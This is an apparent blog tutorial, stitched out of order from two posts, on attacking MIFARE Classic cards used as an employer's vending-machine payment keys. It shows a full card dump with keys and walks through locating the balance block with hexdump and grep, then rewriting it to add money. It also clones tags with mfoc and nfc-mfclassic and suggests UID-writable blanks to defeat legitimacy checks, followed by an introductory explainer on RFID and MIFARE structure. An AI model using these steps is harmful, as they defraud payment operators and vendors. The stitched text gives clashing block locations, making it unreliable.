Block 82, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 81, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 80, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 79, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 78, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 77, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 76, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 75, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 74, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 73, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 72, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 71, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 70, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 69, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 68, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 67, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 7e 17 88 c2 00 00 00 00 00 00

Block 66, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 65, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 64, type A, key a0a1a2a3a4a5 :60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 63, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 4b 44 bb 5a 00 00 00 00 00 00

Block 62, type A, key a0a1a2a3a4a5 :1f 01 b9 04 00 00 00 00 00 00 00 00 4d 49 43 00

Block 61, type B, key 281f343c0a2a :dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

Block 60, type B, key 281f343c0a2a :dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

Block 59, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 0f 00 ff 5a 00 00 00 00 00 00

Block 58, type B, key 58df0c5997fc :dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

Block 57, type B, key 58df0c5997fc :dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

Block 56, type B, key 58df0c5997fc :dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

Block 55, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 0f 00 ff dc 00 00 00 00 00 00

Block 54, type B, key 644a52076b52 :dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

Block 53, type B, key 644a52076b52 :dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

Block 52, type B, key 644a52076b52 :dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

Block 51, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 0f 00 ff a0 00 00 00 00 00 00

Block 50, type B, key 5095280084c1 :dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

Block 49, type B, key 5095280084c1 :dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

Block 48, type B, key 5095280084c1 :dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

Block 47, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 1e 11 ee 5a 00 00 00 00 00 00

Block 46, type B, key 28e848826a1b :dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

Block 45, type B, key 28e848826a1b :01 ee ee ee ee ee ee ee 00 03 9c 01 17 46 00 01

Block 44, type A, key a0a1a2a3a4a5 :08 01 00 80 00 05 5f 23 00 00 21 00 00 01 62 9c

Block 43, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 ff 07 80 69 b0 b1 b2 b3 b4 b5

Block 42, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 41, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 40, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 39, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 ff 07 80 69 b0 b1 b2 b3 b4 b5

Block 38, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 37, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 36, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 35, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 ff 07 80 69 b0 b1 b2 b3 b4 b5

Block 34, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 33, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 32, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 31, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 ff 07 80 69 b0 b1 b2 b3 b4 b5

Block 30, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 29, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 28, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 27, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 ff 07 80 69 b0 b1 b2 b3 b4 b5

Block 26, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 25, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 24, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 23, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 ff 07 80 69 b0 b1 b2 b3 b4 b5

Block 22, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 21, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 20, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 19, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 ff 07 80 69 b0 b1 b2 b3 b4 b5

Block 18, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 17, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 16, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 15, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 ff 07 80 69 b0 b1 b2 b3 b4 b5

Block 14, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 13, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 12, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 11, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 5e 15 aa 69 00 00 00 00 00 00

Block 10, type A, key a0a1a2a3a4a5 :40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40

Block 09, type B, key 34333b1c2938 :01 09 30 00 56 20 a0 00 01 32 97 45 51 00 00 00

Block 08, type A, key a0a1a2a3a4a5 :01 49 49 53 00 00 00 00 00 00 00 00 00 00 00 00

Block 07, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 7e 17 88 69 00 00 00 00 00 00

Block 06, type A, key a0a1a2a3a4a5 :40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40

Block 05, type A, key a0a1a2a3a4a5 :40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40

Block 04, type A, key a0a1a2a3a4a5 :52 46 01 08 01 3f 08 48 31 00 00 00 00 00 00 62

Block 03, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 69 67 89 c2 00 00 00 00 00 00

Block 02, type A, key a0a1a2a3a4a5 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 01, type A, key a0a1a2a3a4a5 :47 01 2c 38 2c 38 00 00 00 00 00 00 00 00 00 00

Block 00, type A, key a0a1a2a3a4a5 :f2 8f a9 1f cb 98 02 00 e0 8f 45 95 45 20 14 11

The tag's dump is saved in ./output.dmp and you can open it with hexdump.

Before being able to change the block which contains how much money you have, you need to find which block it is. That's quite an easy trick. Rememember everything is saved as hexadecimal values so you have to convert your current money value from decimal to hexadecimal. In my case, I had 9,24 euros, so 9 is 0x09 and 24 is 0x18.

We are looking for a block containing 0x09 and 0x18. We run

root@kali: [~/mifare-hack] # hexdump -Cv output.dmp | grep 18

But nothing relevant seems to appear. Maybe we have to try converting the total cents value to hexa? 924 is 0x03 0x9C, let's grep on 9C then.

root@kali: [~/mifare-hack] # hexdump -Cv output.dmp | grep -i 9C

Bingo! We got it:

000002d0 01 ee ee ee ee ee ee ee 00 03 9c 01 17 46 00 01 |.............F..|

It's on Block 1 of Sector 11, remember we count from 0. If you're not sure this is the good block, juste add some money to your card and check again!

Getting more money!

OK. So far, we used to be on the good side of the law, now it's going to be less legal since we are going to write on the block where our wallet is saved. Please remember to reset this value to its initial value after modifying it.

The easiest way to write on a MIFARE Classic tag knowing its keys might be using their own Android app.

Remember the keys cracked by mofc? Add them to the MIFARE app in 'Edit/Add Key File' so the app will be able to read and write on your tag. Then you can read the tag with the app to make sure everything is fine. If so, just write on the right block with the app (Block 1 of Sector 11 for me) on the bytes assigned to your wallet. The app will let you know everything went well, then you can check your account at the snack vending machine, you are rich!

Going further...

At first, I didn't want to write on my card because I only wanted this project to be a proof of concept and I was afraid of breaking anything in the tag. So I bought some blank MIFARE 4K tags. To perform the copy, you'll need to dump the blank tag the same way we did with the one in the card to get the keys:

root@kali: [~/mifare-hack] # mfoc -O blank_tag.dmp

Then use nfc-mfclassic to copy the original tag on the blank one:

root@kali: [~/mifare-hack] # nfc-mfclassic W a original_tag.dmp carte-blank_tag.dmp

If you read the new tag and compare it to the original one - the MIFARE app has a great tool for that, you'll see that everything is the same except for some unused keys and the first block (Block 0). Do you remember we have already talked about that block? It's the UID block, it contains the equivalent of a MAC address for the tag. It can't be changed because it is secured directly on the hardware. It seems that vending machines check one way or another if your tag is legit using this block, that's why I didn't manage to create a functional copy of my card. But you can buy a UID-writable tag on Internet, it's more expensive than a normal one but it can be useful.

Hacking MIFARE & RFID

As we start this series, you won’t find anything that hasn’t already been discussed before. This is not a new topic, but rather my own vision of the many different things that’ve been done concerning RFID. Other Proof of Concepts (PoCs) I’ve read were not so thorough, this is my attempt at being more thorough so others have a better understanding.

The main goal

The goal here is to cover the process of cloning and editing RFID tags. MIFARE Classic ones especially, which are still widely used nowadays despite the many hacks found throughout the last few years. This is not intended to teach you all about RFID, NFC, and MIFARE hacking. So, before we jump in let’s learn some basics.

RFID, NFC & MIFARE : The Basics

Radio Frequency Identification (RFID), is a technology that uses electromagnetic fields to automatically identify and/or track “tags” that contain electronically stored information. Some tags are passive, therefore they are activated by the electromagnetic fields generated by nearby readers. Some tags are active and require a local power source, such as a battery. They are capable of operating hundreds of meters from the closest RFID reader. The use of RFID always implies three things:

• a tag
• a reader
• an antenna (ranging from Low to High and Ultra High frequencies)

Near Field Communication (NFC), is a set of communication protocols. These protocols enable two electronic devices to trade information within 4 centimeters (~2 inches) of each other. NFC operates within the same range of frequencies of RFID. NFC was created as a new way of communicating with other RFID tags.

NFCs main purpose was to break out of the standard tag/reader “read-only” pattern. This is to allow both devices to become reader, antenna, and tag.

MIFARE, is a trademark for a series of chips widely used in contactless smart cards and proximity cards. It is often incorrectly used as a synonym of RFID. MIFARE is owned by NXP semiconductors which was previously known as Philips Electronics.

The reason behind this misuse is simple. MIFARE chips represent approximately 80% of the RFID passive tags in the world.

Think of MIFARE as being the most used type of RFID tags. NFC is simply a newer technology to interact with the first two. With that little bit of knowledge, let’s focus on MIFARE. The MIFARE family is split into subcategories which can be briefly describe here:

• MIFARE Classic 1K/4K: basically just a memory storage device. This memory, either 1024 or 4096 bytes, is divided into sectors and blocks. Most of the time used for regular access badges and has reaaally simple security mechanisms for access control
• MIFARE Ultralight: a 64 bytes version of MIFARE Classic. It’s low costs make it widely used as disposable tickets for events or transportation.
• MIFARE Plus: announced as a replacement of MIFARE Classic. The Plus subfamily brings the new level of security up to 128-bit AES encryption.
• MIFARE DESFire: those tags come pre-programmed with a general purpose DESFire operating system which offers a simple directory structure and files, and are the type of MIFARE offering the highest security levels.

Where my research comes in…

In 2018, my employer started handing out U-KEYs to be used to load funds onto and buy coffee and snacks from different vending machines around the building. With this being 2019, contactless payment is becoming more common with your credit cards/smartphones. These technologies have gone through rigorous testing to ensure users data is securure and so far it’s pretty solid, but what about these little keys?

Turns out with a little bit of research, those keys are simply MIFARE Classic 1K and the associated security mechanisms are actually quite simple. But how simple?

Mifare Cracking Windows

Breaking down MIFARE Classic tag structure

This classic tag structure is a whopping 1,024 bytes in size. Those 1,024 bytes are split into 16 sectors (0 to 15) which are each split into 4 blocks (0 to 3). That’s 16 bytes on each row (Figure 1.1). When we get into modifying data our focus will be a certain byte of data in the 7th byte of the 2nd block of the sector 13.

Every sector has a common structure: 3 blocks of data, and 1 “access control” block. The access control blocks contain Key A, Key B, and the Access Bits. See (Figure 1.2) The A & B keys can be standard (as in the most commonly used) or unique and set by the tag owner, and the access bits determine the rights on each sectors (read, write, both or none).

Moving forward, the only different sector will be sector 0, block 0. This one does not have an access control block but rather a manufacturer block instead. This is where the tag’s manufacturers can store an unique ID (UID) and information like the date of creation. The Manufacturer block is a Read-Only block. Manufacturers do not want end users to modify their data (Figure 1.3).

Knowing how memory is stored, how can it be read? And more importantly, how can it be modified? When we present the tag to a reader, the reader sends a POR (PowerOn Reset). This will get our tag out of its “sleep” passive mode. If the sent request is standard, the tag and the reader will start to communicate and share an encrypted session key. (Figure 2.1)

These operations on a tag are quite simple, visible in Figure 2.1:

• AUTHENTICATE
• READ/WRITE/DECREMENT/INCREMENT – always sent in encrypted session.
• TRANSFER – writes the result of one of the previous operations to non-volatile memory.
• RESTORE – prepares the current value of blocks to be over-written.

Moving on from here, you might have a few questions. Some that come to mind are:

• How strong is this encrypted session?
• Is that encryption crackable?
• Does the tag have any way of checking the modification requests sent from a legitimate reader?
• Can we spoof those requests to modify it with our own data?

Check out the next article if you want your answers. =D